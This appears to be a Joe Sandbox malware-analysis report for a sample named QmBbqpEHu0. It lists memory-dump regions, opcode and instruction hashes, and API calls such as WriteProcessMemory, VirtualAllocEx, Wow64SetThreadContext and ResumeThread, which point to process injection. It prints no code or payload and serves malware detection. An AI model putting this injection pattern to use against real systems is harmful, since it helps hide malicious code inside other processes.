                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f3559639df375468324c7e49fd35171dad0663a01e16c185bb090f7e563d7e63
                                                                                                                                      • Instruction ID: ed7e2aae945589f241fdc832289aa2a50fe0b5ca080193c610345b51637d65f6
                                                                                                                                      • Opcode Fuzzy Hash: f3559639df375468324c7e49fd35171dad0663a01e16c185bb090f7e563d7e63
                                                                                                                                      • Instruction Fuzzy Hash: 1231BEB1D04248CEDF11CBA8C86879DBBF1BF45328F944289C4166B255DB75A946CF41
                                                                                                                                      APIs
                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0765A588
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                      • Opcode ID: 35a60a1b3a195300313d0ca95b2acbcff5c052b9cfbaeb6a968f323e714df061
                                                                                                                                      • Instruction ID: 2fb74ccb59d6bd328f2a66a5c7eac756bec7e17f9db4bc7addbc4ae1d7ebe768
                                                                                                                                      • Opcode Fuzzy Hash: 35a60a1b3a195300313d0ca95b2acbcff5c052b9cfbaeb6a968f323e714df061
                                                                                                                                      • Instruction Fuzzy Hash: 062117B19003499FCF10CFA9C985BDEBBF5FF48320F10842AE919A7240D7789544DBA1
                                                                                                                                      APIs
                                                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 074700D7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DrawText
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2175133113-0
                                                                                                                                      • Opcode ID: cfbc0a730820a7fd837542a27666a73776604be26a46b4dc268e8783a165ef77
                                                                                                                                      • Instruction ID: 77cbbd3d7e905bfe968d5747f6313f7da480476757299a9146467bd62b3d7c0a
                                                                                                                                      • Opcode Fuzzy Hash: cfbc0a730820a7fd837542a27666a73776604be26a46b4dc268e8783a165ef77
                                                                                                                                      • Instruction Fuzzy Hash: 4F21A0B5D012499FDB10CF9AD884ADEFBF5FB48320F14842AE919A7310D775A944CFA0
                                                                                                                                      APIs
                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0765A588
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                      • Opcode ID: ba4eb0fde9d81b4c5a5fdd3dd0f6a6883df130b458a012b20089006087293543
                                                                                                                                      • Instruction ID: ea58c8deadab04573fcddf445a988eaf4668e569bc2b48d3b89f5f6f444c9617
                                                                                                                                      • Opcode Fuzzy Hash: ba4eb0fde9d81b4c5a5fdd3dd0f6a6883df130b458a012b20089006087293543
                                                                                                                                      • Instruction Fuzzy Hash: 7B2127B19003499FCB10CFAAC985BDEBBF5FF48320F10842AE919A7340D7789944DBA1
                                                                                                                                      APIs
                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07659BA6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                      • Opcode ID: 6652d0ee3512f212c0413864554e90d7567d60b25b609bdc5ddd54da3e2b67fb
                                                                                                                                      • Instruction ID: 48c82b7a682e76e6b21fccae026330b502b65e052aa645ef33b32d770a9c81a7
                                                                                                                                      • Opcode Fuzzy Hash: 6652d0ee3512f212c0413864554e90d7567d60b25b609bdc5ddd54da3e2b67fb
                                                                                                                                      • Instruction Fuzzy Hash: FF212AB1D003098FDB10DFAAC4857EEBBF5EF48320F14842AD419A7241D778A945DBA1
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027AD76E,?,?,?,?,?), ref: 027AD82F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: a1b8d2b696f0dadef925d383c3c2c83f29a8b734e97678df15783d0a68add881
                                                                                                                                      • Instruction ID: dc3dfb942374952bbcbaa27661ad093fcfa5d2edaa9f998924ff5faba0578ab4
                                                                                                                                      • Opcode Fuzzy Hash: a1b8d2b696f0dadef925d383c3c2c83f29a8b734e97678df15783d0a68add881
                                                                                                                                      • Instruction Fuzzy Hash: F821E5B5D00249AFDB10CF9AD584ADEBBF5EB48324F14845AE918A7310D374A944CFA1
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027AD76E,?,?,?,?,?), ref: 027AD82F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: 9c69939bd14cdbc1bd99a484e6ec1931589f51a7267fd040b84f39992428e8c4
                                                                                                                                      • Instruction ID: a5a3c475cdc9784a69d05e218fbbd2c5993564fb1e0cd6e1341edea4374de02a
                                                                                                                                      • Opcode Fuzzy Hash: 9c69939bd14cdbc1bd99a484e6ec1931589f51a7267fd040b84f39992428e8c4
                                                                                                                                      • Instruction Fuzzy Hash: BF21E5B5D00249EFDB10CF9AD984ADEBFF9EB48720F14855AE918A3311D374A944CF61
                                                                                                                                      APIs
                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0765A668
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                      • Opcode ID: 06977e5f4624a6d0ff127e8704900d4bccd9fb1309f6d7613cf0c7745d05df58
                                                                                                                                      • Instruction ID: db1a6744c6b0e2ea53291ae6ced6c7279c5b05a36196d0bfa855ee24921011c9
                                                                                                                                      • Opcode Fuzzy Hash: 06977e5f4624a6d0ff127e8704900d4bccd9fb1309f6d7613cf0c7745d05df58
                                                                                                                                      • Instruction Fuzzy Hash: CE2148B1D002499FCB10CFAAC981ADEBBF5FF48320F10842AE919A7240C7789540DBA1
                                                                                                                                      APIs
                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0765A668
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                      • Opcode ID: 677363a68214be1904729c418582df6a6e9e2547188cfbe7a2e19e8d236d48af
                                                                                                                                      • Instruction ID: d723a8ef574a0c24bfdf5f84b4a304ba73808eb25380861adf936e8ce403ccb1
                                                                                                                                      • Opcode Fuzzy Hash: 677363a68214be1904729c418582df6a6e9e2547188cfbe7a2e19e8d236d48af
                                                                                                                                      • Instruction Fuzzy Hash: 652139B1D003499FCB10CFAAC881ADEFBF5FF48320F10852AE919A7240D7789540DBA1
                                                                                                                                      APIs
                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07659BA6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                      • Opcode ID: 2366aa5f2d39a76f8ccdb986720d19dc37c451fcf70504c939eb2ed016e3ee04
                                                                                                                                      • Instruction ID: 43613e60dc04972d017915e3c7bda0bc208934e5aeae5ad58a32e7835097438b
                                                                                                                                      • Opcode Fuzzy Hash: 2366aa5f2d39a76f8ccdb986720d19dc37c451fcf70504c939eb2ed016e3ee04
                                                                                                                                      • Instruction Fuzzy Hash: DA2109B1D003098FDB10DFAAC4857AEBBF5EF88324F148429D519A7241D778A945DFA1
                                                                                                                                      APIs
                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0747DA83
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 272c4346022b53bf181d4fc52cd63ca4a6efcb49a38c88ea4addb912712b7296
                                                                                                                                      • Instruction ID: ce36d37faaca666444ce31ea9a5221e96a1969c79bdf9d3c961e817d42646fe6
                                                                                                                                      • Opcode Fuzzy Hash: 272c4346022b53bf181d4fc52cd63ca4a6efcb49a38c88ea4addb912712b7296
                                                                                                                                      • Instruction Fuzzy Hash: F021F4B6D002499FCB10CF9AD485BDEFBF8FB48320F10842AE958A7651D378A545DFA1
                                                                                                                                      APIs
                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0765A4A6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: ac27d4f57f28b9d43551f6be9057feaf3ca356cee4fa52e1724b5096d83dd59e
                                                                                                                                      • Instruction ID: fd9f273062d78c8736b3b7b9c9c24481109c62b610c8b033391802581e6721c5
                                                                                                                                      • Opcode Fuzzy Hash: ac27d4f57f28b9d43551f6be9057feaf3ca356cee4fa52e1724b5096d83dd59e
                                                                                                                                      • Instruction Fuzzy Hash: C41129B29002499FCB20DFAAC845ADFBFF5EF88320F248419E519A7250C775A544DFA1
                                                                                                                                      APIs
                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0747DA83
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: d57e939c09b976702a1de2aa819e9446db795ea45c53f91f07072002df689e24
                                                                                                                                      • Instruction ID: 912c5a5f21344cb13574d079c4f1fcaaf7c460fb690ae24f1d8aea03b0eb7b60
                                                                                                                                      • Opcode Fuzzy Hash: d57e939c09b976702a1de2aa819e9446db795ea45c53f91f07072002df689e24
                                                                                                                                      • Instruction Fuzzy Hash: FE21C2B5D042499FCB10CF9AC985ADEFBF8FB48320F10842AE958A7251D378A544DFA1
                                                                                                                                      APIs
                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0765A4A6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: 31a7a1941961b83e3ff03b51ace428764bd3fe38e309d031e2638ec209d8e415
                                                                                                                                      • Instruction ID: d00ab866a073754b59d7dd37e479c8cbc56071e655f2d69a46dee34c02859f99
                                                                                                                                      • Opcode Fuzzy Hash: 31a7a1941961b83e3ff03b51ace428764bd3fe38e309d031e2638ec209d8e415
                                                                                                                                      • Instruction Fuzzy Hash: 6B110AB19002499FDF10DFAAC845ADEBFF5EF88320F148419E519A7250C7759544DFA1
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ResumeThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                      • Opcode ID: 71c30e69b71c5412d3bb8efb2d0caaf4423d2e104c9ed782d677b1540b24a664
                                                                                                                                      • Instruction ID: 721619bb87379ebcbe62d19cf38fd42637dabda76042824abfd2adf917a29768
                                                                                                                                      • Opcode Fuzzy Hash: 71c30e69b71c5412d3bb8efb2d0caaf4423d2e104c9ed782d677b1540b24a664
                                                                                                                                      • Instruction Fuzzy Hash: F11176B59003498EDB20DFAAC4457DEFFF4AF88320F24881AD459A7340CB75A580CBA1
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ResumeThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                      • Opcode ID: 4357fe8caeb253328dfd22e636b2e3d866cdc1fc98a4f08fb1a69273253eb91f
                                                                                                                                      • Instruction ID: 8c8553e601e85e19bec1de834dd208dea70615a8f9de9fbd3842714ba93b0e6b
                                                                                                                                      • Opcode Fuzzy Hash: 4357fe8caeb253328dfd22e636b2e3d866cdc1fc98a4f08fb1a69273253eb91f
                                                                                                                                      • Instruction Fuzzy Hash: 231128B1D003498FDB20DFAAC44579EFBF5EF88324F248419D519A7340CB75A540CBA5
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 027AB546
Memory Dump Source
• Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 0765CFBD
Memory Dump Source
• Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 0765CFBD
Memory Dump Source
• Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Memory Dump Source
• Source File: 00000000.00000002.3589269720.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c6d000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.3589964830.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c7d000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.3589964830.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c7d000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.3589269720.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c6d000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.3589964830.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c7d000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.3589964830.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c7d000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: {#L
• API String ID: 0-1361971085
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: {#L
• API String ID: 0-1361971085
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: 98R
• API String ID: 0-576591972
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: -2m
• API String ID: 0-2686427999
Strings
Memory Dump Source
• Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
Similarity
• API ID:
• String ID: w7e^
• API String ID: 0-1657886525
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 0ni
                                                                                                                                      • API String ID: 0-1488673370
                                                                                                                                      • Opcode ID: 0f600e45739287516ee0eda63dcc81cc4c5d52ad78202df9b3eafa5287cb3dbe
                                                                                                                                      • Instruction ID: 9b57378ca402d765b1232895d79dfec9dd3f5fb909caaa66b7cad5f071aba6a4
                                                                                                                                      • Opcode Fuzzy Hash: 0f600e45739287516ee0eda63dcc81cc4c5d52ad78202df9b3eafa5287cb3dbe
                                                                                                                                      • Instruction Fuzzy Hash: 79515BB1E156188BDB58CF6B994579EFBF3AFC9300F14C1BAD50CA6214EB340A858F51
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: w7e^
                                                                                                                                      • API String ID: 0-1657886525
                                                                                                                                      • Opcode ID: eade18745b4e783f05fc6363b856f12d51b48f1e03df562347b3fd56ba68b4d5
                                                                                                                                      • Instruction ID: 66f6bde0dd640a75395bd2767844a9a19664be53be0386c3788165ec3ee26539
                                                                                                                                      • Opcode Fuzzy Hash: eade18745b4e783f05fc6363b856f12d51b48f1e03df562347b3fd56ba68b4d5
                                                                                                                                      • Instruction Fuzzy Hash: DD4127B4D15269CFCB04CFAAC9406EEFBB1BB8A301F1499AAC015B7254D7384646CF58
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ef55743d40c0b9c898b249a20a9e24483af37f3f597cab8b11a8ad0511175e11
                                                                                                                                      • Instruction ID: 3213b98f671065de1b9494781c6b360e48b8bb53e5a8bf7c908acdbd1bcf9b5c
                                                                                                                                      • Opcode Fuzzy Hash: ef55743d40c0b9c898b249a20a9e24483af37f3f597cab8b11a8ad0511175e11
                                                                                                                                      • Instruction Fuzzy Hash: 46E1D8B4E041198FCB14DFA9C5809AEFBF2FF89304F248169D819AB355D731A982DF61
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b7b5ad24b27fd63f8fdaa23cf309532970fc157f707ec56efa37624f0b06755d
                                                                                                                                      • Instruction ID: 60c806f43cf3fd53c088a3184002b5b5952c0d08d5002c1e699b9ca95d196b90
                                                                                                                                      • Opcode Fuzzy Hash: b7b5ad24b27fd63f8fdaa23cf309532970fc157f707ec56efa37624f0b06755d
                                                                                                                                      • Instruction Fuzzy Hash: 60E1E6B4E04219CFCB14DFA9C5909AEFBF2BF89304F248169D819AB355D731A942DF60
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 10d6c80ecc625e56f1dc95b0d63be46af86d17c4c9a2622728d8ece369b2b92c
                                                                                                                                      • Instruction ID: 2c905c88b5d9e1129b36e725aadf4d9791d92574d00346cb7d4bf06611e90093
                                                                                                                                      • Opcode Fuzzy Hash: 10d6c80ecc625e56f1dc95b0d63be46af86d17c4c9a2622728d8ece369b2b92c
                                                                                                                                      • Instruction Fuzzy Hash: FDE10BB4E0411A8FCB14DFA9C5809AEFBF2FF89304F248169D815AB355D731A942DFA1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ce590b940678a9dd13748db4df4d86475a0b057d139d999fb43ff3acf8aa726c
                                                                                                                                      • Instruction ID: 13e44824594d9af7fe6b5d51cb11d5a6413cafc5c1cda7a8b8ffc65fa5653767
                                                                                                                                      • Opcode Fuzzy Hash: ce590b940678a9dd13748db4df4d86475a0b057d139d999fb43ff3acf8aa726c
                                                                                                                                      • Instruction Fuzzy Hash: 30E1E8B4E042198FCB14DFA9C5809AEFBF2FF89304F248169D815AB355D731A942DFA1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 04a2cb25d764eb94c627df0a3b2930f83c62c0310bca53cda53a8db3e48b589a
                                                                                                                                      • Instruction ID: 6211290ef159137431ba43b4d827e033b8589d74563376ff55f741971b68d31c
                                                                                                                                      • Opcode Fuzzy Hash: 04a2cb25d764eb94c627df0a3b2930f83c62c0310bca53cda53a8db3e48b589a
                                                                                                                                      • Instruction Fuzzy Hash: 60E1E9B4E042198FCB14DFA9C5909AEFBF2FF89304F248169D815AB355D731A982DF60
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 03c6a249fb0f5c944f133941a352ae026820e4f38ae0f7bad7f66936becc8790
                                                                                                                                      • Instruction ID: fd437220407893f99fb012d3102d21ab53e6e64c6c459d9657a4f7b1d6594dfd
                                                                                                                                      • Opcode Fuzzy Hash: 03c6a249fb0f5c944f133941a352ae026820e4f38ae0f7bad7f66936becc8790
                                                                                                                                      • Instruction Fuzzy Hash: 7BA15C32E002158FCF09DFB4C85459EB7B2FFC5315B25866AE805AB265DB31E956CF80
                                                                                                                                      Memory Dump Source
